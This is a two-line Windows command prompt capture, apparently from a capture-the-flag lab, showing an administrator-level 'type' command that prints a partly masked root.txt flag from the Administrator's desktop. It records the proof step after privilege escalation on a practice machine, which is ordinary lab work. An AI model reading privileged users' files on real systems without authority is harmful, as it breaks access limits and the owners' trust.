C:\Windows\system32>type "C:\Users\Administrator\Desktop\root.txt"
30f4bd********************312ab8